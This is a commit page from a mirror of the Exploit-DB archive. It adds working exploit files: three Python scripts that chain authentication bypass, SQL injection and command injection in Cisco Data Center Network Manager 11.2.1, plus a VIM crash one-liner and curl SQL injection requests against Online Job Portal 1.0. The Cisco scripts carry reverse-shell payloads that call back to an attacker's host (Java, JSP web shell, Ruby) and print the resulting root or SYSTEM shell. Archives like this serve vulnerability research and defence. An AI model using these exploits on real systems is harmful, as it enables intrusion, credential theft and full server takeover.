bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-02-07

Browse source 
16 changes to exploits/shellcodes

AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)
AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)
VIM 8.2 - Denial of Service (PoC)
AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)
TapinRadio 2.12.3 - 'address' Denial of Service (PoC)
TapinRadio 2.12.3 - 'username' Denial of Service (PoC)
RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)
RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)

ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path
Online Job Portal 1.0 - 'user_email' SQL Injection
Online Job Portal 1.0 - Remote Code Execution
Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
Ecommerce Systempay 1.0 - Production KEY Brute Force
Cisco Data Center Network Manager 11.2 - Remote Code Execution
Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection
Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection
This commit is contained in:
Offensive Security 2020-02-07 05:02:01 +00:00
parent 7d757326b8
commit 923f53211e
17 changed files with 1235 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

265
exploits/java/webapps/48018.py Executable file
View file

@ -0,0 +1,265 @@
#!/usr/bin/python
"""
Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
Bug 1: CVE-2019-15975 / ZDI-20-003
Bug 2: CVE-2019-15979 / ZDI-20-100
Notes:
======
Si.java needs to be compiled against Java 8 (the target used 1.8u201):
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Si {
static{
try {
String host = "192.168.100.159";
int port = 1337;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host,port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0){
so.write(pi.read());
}
while(pe.available()>0){
so.write(pe.read());
}
while(si.available()>0){
po.write(si.read());
}
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}catch (Exception e){}
}
p.destroy();
s.close();
}catch (IOException | InterruptedException e){ }
}
}
Example:
========
1. Modify the above Si.java to contain your connectback ip and port
2. Compile the above Si.java class with Java 8 and store it in an attacker controlled share
3. Launch the poc.py against your target using the share
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py <target> <connectback:port> <smbserver> <smbpath>
(+) eg: ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools'
saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools'
(+) attempting auth bypass 1
(+) bypassed auth! added a global admin hacker:Hacked123
(+) attempting to load class from \\vmware-host\Shared Folders\tools\Si.class
(+) starting handler on port 1337
(+) connection from 192.168.100.122
(+) pop thy shell!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami
whoami
nt authority\system
C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>
"""
import re
import os
import sys
import time
import base64
import socket
import requests
import calendar
import telnetlib
from uuid import uuid4
from threading import Thread
from Crypto.Cipher import AES
from xml.etree import ElementTree
from datetime import datetime, timedelta
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class AESCipher:
def __init__(self):
# Cisco's hardcoded key
self.key = "s91zEQmb305F!90a"
self.bs = 16
def _pad(self, s):
return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
def encrypt(self, raw):
raw = self._pad(raw)
iv = "\x00" * 0x10
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return base64.b64encode(cipher.encrypt(raw))
def make_raw_token(target):
""" craft our token """
key = "Source Incite"
uuid = str(uuid4()).replace("-","")[0:20]
time = leak_time(target)
return "%s-%s-%s" % (key, uuid, time)
def bypass_auth(target, token, usr, pwd):
""" we use this primitive to fully bypass auth """
global user_added_already
d = {
"userName" : usr,
"password" : pwd,
"roleName" : "global-admin"
}
h = { "afw-token" : token }
uri = "https://%s/fm/fmrest/dbadmin/addUser" % target
r = requests.post(uri, data=d, headers=h, verify=False)
try:
json = r.json()
except ValueError:
return False
if json["resultMessage"] == "Success":
user_added_already = False
return True
elif json["resultMessage"] == "User already exists.":
user_added_already = True
return True
return False
def leak_time(target):
""" leak the time from the server (not really needed) """
uri = "https://%s/" % target
r = requests.get(uri, verify=False)
r_time = datetime.strptime(r.headers['Date'][:-4], '%a, %d %b %Y %H:%M:%S')
return calendar.timegm(r_time.timetuple())
def gen_token(target, usr, pwd):
""" this authenticates via the SOAP endpoint """
soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.jaxws.dcbu.cisco.com/">'
soap_body += '\t<soapenv:Header/>'
soap_body += '\t<soapenv:Body>'
soap_body += '\t\t<ep:requestToken>'
soap_body += '\t\t\t<username>%s</username>' % usr
soap_body += '\t\t\t<password>%s</password>' % pwd
soap_body += '\t\t\t<expiration>100000</expiration>'
soap_body += '\t\t</ep:requestToken>'
soap_body += '\t</soapenv:Body>'
soap_body += '</soapenv:Envelope>'
uri = "https://%s/LogonWSService/LogonWS" % target
r = requests.post(uri, data=soap_body, verify=False)
tree = ElementTree.fromstring(r.content)
for elem in tree.iter():
if elem.tag == "return":
return elem.text
return False
def craft_soap_header(target, usr, pwd):
""" this generates the soap header """
soap_header = '\t<SOAP-ENV:Header xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
soap_header += '<m:token xmlns:m="http://ep.jaxws.dcbu.cisco.com/">%s</m:token>' % gen_token(target, usr, pwd)
soap_header += '\t</SOAP-ENV:Header>'
return soap_header
def load_remote_class(target, smb, usr, pwd):
""" this triggers the cmdi """
soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
soap_body += craft_soap_header(target, usr, pwd)
soap_body += '\t<soapenv:Body>'
soap_body += '\t\t<ep:importTS>'
soap_body += '\t\t\t<certFile>" -providerclass Si -providerpath "%s</certFile>' % smb
soap_body += '\t\t\t<serverIPAddress></serverIPAddress>'
soap_body += '\t\t</ep:importTS>'
soap_body += '\t</soapenv:Body>'
soap_body += '</soapenv:Envelope>'
uri = "https://%s/SanWSService/SanWS" % target
r = requests.post(uri, data=soap_body, verify=False)
tree = ElementTree.fromstring(r.content)
for elem in tree.iter():
if elem.tag == "resultMessage":
if elem.text == "Success":
return True
return False
def handler(lp):
print "(+) starting handler on port %d" % lp
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lp))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
t.sock = conn
print "(+) pop thy shell!"
t.interact()
def exec_code(t, lp, s, usr, pwd):
handlerthr = Thread(target=handler, args=(lp,))
handlerthr.start()
load_remote_class(t, s, usr, pwd)
def main():
usr = "hacker"
pwd = "Hacked123"
if len(sys.argv) != 5:
print "(+) usage: %s <target> <connectback:port> <smbserver> <smbpath>" % sys.argv[0]
print "(+) eg: %s 192.168.100.122 192.168.100.159:1337 vmware-host '\\Shared Folders\\tools'" % sys.argv[0]
sys.exit(1)
t = sys.argv[1]
c = sys.argv[2]
s = "\\\\%s%s" % (sys.argv[3], sys.argv[4])
i = 0
if not ":" in c:
print "(+) using default connectback port 4444"
ls = c
lp = 4444
else:
if not c.split(":")[1].isdigit():
print "(-) %s is not a port number!" % cb.split(":")[1]
sys.exit(-1)
ls = c.split(":")[0]
lp = int(c.split(":")[1])
# InheritableThreadLocal.childValue performs a 'shallow copy' and causes a small race condition
while 1:
i += 1
print "(+) attempting auth bypass %d" % i
raw = make_raw_token(t)
cryptor = AESCipher()
token = cryptor.encrypt(raw)
if bypass_auth(t, token, usr, pwd):
if not user_added_already:
print "(+) bypassed auth! added a global admin %s:%s" % (usr, pwd)
else:
print "(+) we probably already bypassed auth! try the account %s:%s" % (usr, pwd)
break
sys.stdout.write('\x1b[1A')
sys.stdout.write('\x1b[2K')
# we have bypassed the authentication at this point
print "(+) attempting to load class from %s\\Si.class" % s
exec_code(t, lp, s, usr, pwd)
if __name__ == "__main__":
main()

323
exploits/java/webapps/48019.py Executable file
View file

@ -0,0 +1,323 @@
#!/usr/bin/python
"""
Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
Bug 1: CVE-2019-15976 / ZDI-20-008
Bug 2: CVE-2019-15984 / ZDI-20-060
Example:
========
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py <target> <connectback>
(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337
saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337
(+) created the account hacker:Hacked123
(+) created the 1337/custom path!
(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c
(+) SQL Injection working!
(+) wrote the si.jsp shell!
(+) cleaned up the database!
(+) starting handler on port 1337
(+) connection from 192.168.100.122
(+) pop thy shell!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami
whoami
nt authority\system
C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>
Clean Up:
=========
1. delete from xmlDocs where user_name = '1337';
2. delete si.jsp from the web root
3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337
"""
import re
import md5
import sys
import time
import socket
import base64
import requests
import telnetlib
from threading import Thread
from xml.etree import ElementTree
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def _get_jsp(cbh, cbp):
""" get me some jsp for a connectback! """
jsp = """
<%%@page import="java.lang.*"%%>
<%%@page import="java.util.*"%%>
<%%@page import="java.io.*"%%>
<%%@page import="java.net.*"%%>
<%%
// clean up
String[] files = {
"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml",
"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/",
"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/",
};
for (String s:files){ File f = new File(s); f.delete(); }
File f = new File(application.getRealPath("/" + this.getClass().getSimpleName().replaceFirst("_",".")));
f.delete();
class StreamConnector extends Thread
{
InputStream we;
OutputStream uo;
StreamConnector( InputStream we, OutputStream uo )
{
this.we = we;
this.uo = uo;
}
public void run()
{
BufferedReader dy = null;
BufferedWriter zvi = null;
try
{
dy = new BufferedReader( new InputStreamReader( this.we ) );
zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) );
char buffer[] = new char[8192];
int length;
while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 )
{
zvi.write( buffer, 0, length );
zvi.flush();
}
} catch( Exception e ){}
try
{
if( dy != null )
dy.close();
if( zvi != null )
zvi.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath;
ShellPath = new String("cmd.exe");
Socket socket = new Socket( "%s", %s);
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%%>
""" % (cbh, cbp)
return jsp
def get_session(target, user, password):
""" we have bypassed auth at this point and created an admin """
d = {
"j_username" : user,
"j_password" : password
}
uri = "https://%s/j_spring_security_check" % target
r = requests.post(uri, data=d, verify=False, allow_redirects=False)
if "Set-Cookie" in r.headers:
match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,4}:.{44});", r.headers["Set-Cookie"])
if match:
sessionid = match.group(1)
resttoken = match.group(2)
return { "JSESSIONID" : sessionid, "resttoken": resttoken}
return False
def craft_soap_header():
soap_header = '\t<SOAP-ENV:Header xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
soap_header += '<m:ssoToken xmlns:m="http://ep.jaxws.dcbu.cisco.com/">%s</m:ssoToken>' % gen_ssotoken()
soap_header += '\t</SOAP-ENV:Header>'
return soap_header
def we_can_trigger_folder_path_creation(target):
""" craft the path location and db entry for the traversal """
soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
soap_body += craft_soap_header()
soap_body += '\t<soapenv:Body>'
soap_body += '\t\t<ep:saveReportTemplate>'
soap_body += '\t\t\t<reportTemplateName>si</reportTemplateName>'
soap_body += '\t\t\t<userName>1337</userName>'
soap_body += '\t\t\t<updatedAttrs></updatedAttrs>'
soap_body += '\t\t\t<pmInterval>1337</pmInterval>'
soap_body += '\t\t</ep:saveReportTemplate>'
soap_body += '\t</soapenv:Body>'
soap_body += '</soapenv:Envelope>'
uri = "https://%s/ReportWSService/ReportWS" % target
r = requests.post(uri, data=soap_body, verify=False)
if r.status_code == 200:
return True
return False
def we_can_trigger_second_order_write(target, shellpath):
""" trigger the traversal """
soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
soap_body += craft_soap_header()
soap_body += '\t<soapenv:Body>'
soap_body += '\t\t<ep:openReportTemplate>'
soap_body += '\t\t\t<reportTemplateName>%s</reportTemplateName>' % shellpath
soap_body += '\t\t\t<userName>1337</userName>'
soap_body += '\t\t</ep:openReportTemplate>'
soap_body += '\t</soapenv:Body>'
soap_body += '</soapenv:Envelope>'
uri = "https://%s/ReportWSService/ReportWS" % target
r = requests.post(uri, data=soap_body, verify=False)
if r.status_code == 200:
return True
return False
def gen_ssotoken():
""" auth bypass """
timestamp = 9999999999999 # we live forever
username = "hax" # doesnt even need to exist!
sessionid = 1337 # doesnt even need to exist!
d = "%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF" % (username, sessionid, timestamp)
return "%d.%d.%s.%s" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username)
def we_can_trigger_sql_injection(target, sql):
""" stacked sqli primitive """
sqli = ";%s--" % sql
soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
soap_body += craft_soap_header()
soap_body += '\t<soapenv:Body>'
soap_body += '\t\t<ep:getVmHostData>'
soap_body += '\t\t\t<arg0>'
soap_body += '\t\t\t\t<sortField>vcluster</sortField>'
soap_body += '\t\t\t\t<sortType>%s</sortType>' % sqli
soap_body += '\t\t\t</arg0>'
soap_body += '\t\t\t<arg1></arg1>'
soap_body += '\t\t\t<arg2></arg2>'
soap_body += '\t\t\t<arg3>false</arg3>'
soap_body += '\t\t</ep:getVmHostData>'
soap_body += '\t</soapenv:Body>'
soap_body += '</soapenv:Envelope>'
uri = "https://%s/DbInventoryWSService/DbInventoryWS" % target
r = requests.post(uri, data=soap_body, verify=False)
if r.status_code == 200:
return True
return False
def we_can_leak_vfs(target):
""" we use a information disclosure for the vfs path """
global vfs
uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target
c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345')
r = requests.get(uri, verify=False, auth=c)
match = re.search(r"temp\\(.{21}content-.{15,16})", r.text)
if match:
vfs = str(match.group(1).replace("\\","/"))
return True
return False
def handler(lp):
""" this is the client handler, to catch the connectback """
print "(+) starting handler on port %d" % lp
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lp))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
t.sock = conn
print "(+) pop thy shell!"
t.interact()
def exec_code(t, usr, pwd, cbp):
""" this function threads the client handler and sends off the attacking payload """
handlerthr = Thread(target=handler, args=(int(cbp),))
handlerthr.start()
r = requests.get("https://%s/si.jsp" % t, cookies=get_session(t, usr, pwd), verify=False)
def we_can_add_user(target, usr, pwd):
""" add a user so that we can reach our backdoor! """
soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
soap_body += craft_soap_header()
soap_body += '\t<soapenv:Body>'
soap_body += '\t\t<ep:addUser>'
soap_body += '\t\t\t<userName>%s</userName>' % usr
soap_body += '\t\t\t<password>%s</password>' % pwd
soap_body += '\t\t\t<roleName>global-admin</roleName>'
soap_body += '\t\t\t<enablePwdExpiration>false</enablePwdExpiration>'
soap_body += '\t\t</ep:addUser>'
soap_body += '\t</soapenv:Body>'
soap_body += '</soapenv:Envelope>'
uri = "https://%s/DbAdminWSService/DbAdminWS" % target
r = requests.post(uri, data=soap_body, verify=False)
tree = ElementTree.fromstring(r.content)
for elem in tree.iter():
if elem.tag == "resultMessage":
res = elem.text
if res == "Success":
return True
elif res == "User already exists.":
return True
return False
def main():
usr = "hacker"
pwd = "Hacked123"
if len(sys.argv) != 3:
print "(+) usage: %s <target> <connectback>" % sys.argv[0]
print "(+) eg: %s 192.168.100.122 192.168.100.59:1337" % sys.argv[0]
sys.exit(1)
t = sys.argv[1]
c = sys.argv[2]
cbh = c.split(":")[0]
cbp = c.split(":")[1]
sc = _get_jsp(cbh, cbp).encode("hex")
# stage 1 - add a user
if we_can_add_user(t, usr, pwd):
print "(+) created the account %s:%s" % (usr, pwd)
# stage 2 - trigger folder creation and db entry
if we_can_trigger_folder_path_creation(t):
print "(+) created the 1337/custom path!"
# stage 3 - leak the vfs path (not really required I suppose)
if we_can_leak_vfs(t):
print "(+) leaked vfs! %s" % vfs
# stage 4 - trigger the sql injection to update our template entry
sp = "../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp" % vfs
sql = "update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';" % (sp, sc)
if we_can_trigger_sql_injection(t, sql):
print "(+) SQL Injection working!"
# stage 5 - trigger the shell write
if we_can_trigger_second_order_write(t, sp):
print "(+) wrote the si.jsp shell!"
# stage 6 - cleanup
sql = "delete from xmldocs where user_name='1337';"
if we_can_trigger_sql_injection(t, sql):
print "(+) cleaned up the database!"
# stage 7 - go get some rce
exec_code(t, usr, pwd, cbp)
if __name__ == "__main__":
main()

201
exploits/java/webapps/48020.py Executable file
View file

@ -0,0 +1,201 @@
#!/usr/bin/python
"""
Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal servers
- Release: 11.2(1)
- Release Date: 05-Jun-2019
- FileName: dcnm-va.11.2.1.iso.zip
- Size: 4473.54 MB (4690850167 bytes)
- MD5 Checksum: b1bba467035a8b41c63802ce8666b7bb
Bug 1: CVE-2019-15977 / ZDI-20-012
Bug 2: CVE-2019-15977 / ZDI-20-013
Bug 3: CVE-2019-15978 / ZDI-20-102
Example:
========
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py <target> <connectback:port>
(+) eg: ./poc.py 192.168.100.123 192.168.100.59
(+) eg: ./poc.py 192.168.100.123 192.168.100.59:1337
saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.59:1337
(+) leaked user: root
(+) leaked pass: Dcnmpass123
(+) leaked vfs path: temp18206a94b7c45072/content-85ba056e1faec012
(+) created a root session!
(+) starting handler on port 1337
(+) connection from 192.168.100.123
(+) pop thy shell!
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux localhost 3.10.0-957.10.1.el7.x86_64 #1 SMP Mon Mar 18 15:06:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
"""
import re
import sys
import random
import socket
import string
import requests
import telnetlib
from threading import Thread
from Crypto.Cipher import Blowfish
from requests.auth import HTTPBasicAuth
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def handler(lp):
print "(+) starting handler on port %d" % lp
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lp))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
t.sock = conn
print "(+) pop thy shell!"
t.interact()
def exec_code(t, lp, s):
handlerthr = Thread(target=handler, args=(lp,))
handlerthr.start()
c = { "JSESSIONID" : sessionid }
r = requests.get("https://%s/%s" % (t, s), cookies=c, verify=False)
def random_string(string_length = 8):
""" generate a random string of fixed length """
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(string_length))
def decrypt(key):
""" decrypt the leaked password """
cipher = Blowfish.new("jaas is the way", Blowfish.MODE_ECB)
msg = cipher.decrypt(key.decode("hex"))
return msg
def we_can_leak(target):
""" used to bypass auth """
global dbuser, dbpass, vfspth, jdbc, rootuser, rootpass
dbuser = None
dbpass = None
vfspth = None
rootuser = None
rootpass = None
jdbc = None
uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target
c = HTTPBasicAuth('admin', 'nbv_12345')
r = requests.get(uri, verify=False, auth=c)
leaked = r.text
match = re.search("db.password = #(.*)", leaked)
if match:
dbpass = match.group(1)
match = re.search("db.user = (.*)", leaked)
if match:
dbuser = match.group(1)
match = re.search("dcnmweb = (.*)", leaked)
if match:
vfspth = match.group(1)
match = re.search("db.url = (.*)", leaked)
if match:
jdbc = match.group(1)
match = re.search("server.sftp.password = #(.*)", leaked)
if match:
rootpass = match.group(1)
match = re.search("server.sftp.username = (.*)", leaked)
if match:
rootuser = match.group(1)
if dbuser and dbpass and vfspth and jdbc and rootuser and rootpass:
return True
return False
def we_can_login(target, password):
""" we have bypassed auth at this point by leaking the creds """
global sessionid, resttoken
d = {
"j_username" : rootuser,
"j_password" : password,
}
uri = "https://%s/j_spring_security_check" % target
r = requests.post(uri, data=d, verify=False, allow_redirects=False)
if "Set-Cookie" in r.headers:
match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,3}:.{44});", r.headers["Set-Cookie"])
if match:
sessionid = match.group(1)
resttoken = match.group(2)
return True
return False
def pop_a_root_shell(t, ls, lp):
""" get dat shell! """
handlerthr = Thread(target=handler, args=(lp,))
handlerthr.start()
uri = "https://%s/rest/fabrics" % t
cmdi = "%s\";'`{ruby,-rsocket,-e'c=TCPSocket.new(\"%s\",\"%d\");" % (random_string(), ls, lp)
cmdi += "while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print(io.read)}end'}`'\""
j = {
"name" : cmdi,
# this is needed to pass validate() on line 149 of the LanFabricImpl class
"generalSetting" : {
"asn" : "1337",
"provisionOption" : "Manual"
},
"provisionSetting" : {
"dhcpSetting": {
"primarySubnet" : "127.0.0.1",
"primaryDNS" : "127.0.0.1",
"secondaryDNS" : "127.0.0.1"
},
"ldapSetting" : {
"server" : "127.0.0.1"
},
"amqpSetting" : {
"server" : "127.0.0.1:1337"
}
}
}
c = { "resttoken": resttoken }
r = requests.post(uri, json=j, cookies=c, verify=False)
if r.status_code == 200 and ls in r.text:
return True
return False
def main():
if len(sys.argv) != 3:
print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
print "(+) eg: %s 192.168.100.123 192.168.100.59" % sys.argv[0]
print "(+) eg: %s 192.168.100.123 192.168.100.59:1337" % sys.argv[0]
sys.exit(1)
t = sys.argv[1]
cb = sys.argv[2]
if not ":" in cb:
print "(+) using default connectback port 4444"
ls = cb
lp = 4444
else:
if not cb.split(":")[1].isdigit():
print "(-) %s is not a port number!" % cb.split(":")[1]
sys.exit(-1)
ls = cb.split(":")[0]
lp = int(cb.split(":")[1])
# stage 1 - leak the creds
if we_can_leak(t):
pwd = re.sub(r'[^\x20-\x7F]+','', decrypt(rootpass))
print "(+) leaked user: %s" % rootuser
print "(+) leaked pass: %s" % pwd
print "(+) leaked vfs path: %s" % "/".join(vfspth.split("/")[10:])
# stage 2 - get a valid sesson
if we_can_login(t, pwd):
print "(+) created a root session!"
# stage 3 - get a root shell via cmdi
pop_a_root_shell(t, ls, lp)
if __name__ == "__main__":
main()

11
exploits/linux/dos/48008.txt Normal file
View file

@ -0,0 +1,11 @@
# Exploit Title: VIM 8.2 - Denial of Service (PoC)
# Date: 2019-12-17
# Vulnerability: DoS
# Vulnerability Discovery: Dhiraj Mishra
# Vulnerable Version: VIM - Vi IMproved 8.2 (Included patches: 1-131)
# Vendor Homepage: https://www.vim.org/
# References:
# https://github.com/vim/vim/commit/98a336dd497d3422e7efeef9f24cc9e25aeb8a49
# Invalid memory access with search command
PoC: vim --clean -e -s -c 'exe "norm /\x80PS"'

56
exploits/php/webapps/48007.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: Online Job Portal 1.0 - 'user_email' SQL Injection
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A
# POC:
# 1)
#
curl -i -s -k -X $'POST' \
-H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 282' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
--data-binary $'user_email=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20VerAyari&user_pass=0x5665724179617269&btnLogin=0x5665724179617269' \
$'http://localhost/[PATH]/admin/login.php'
#
HTTP/1.1 200 OK
Date: Wed, 05 Feb 2020 19:18:45 GMT
Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3251
Connection: close
Content-Type: text/html; charset=UTF-8
.............
<!-- /.login-box -->
Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key'
#
# POC:
# 2)
#
curl -i -s -k -X $'POST' \
-H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 237' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
--data-binary $'USERNAME=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20verayari&PASS=VerAyari' \
$'http://localhost/[PATH]/process.php?action=login'
#
HTTP/1.1 200 OK
Date: Wed, 05 Feb 2020 19:17:19 GMT
Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
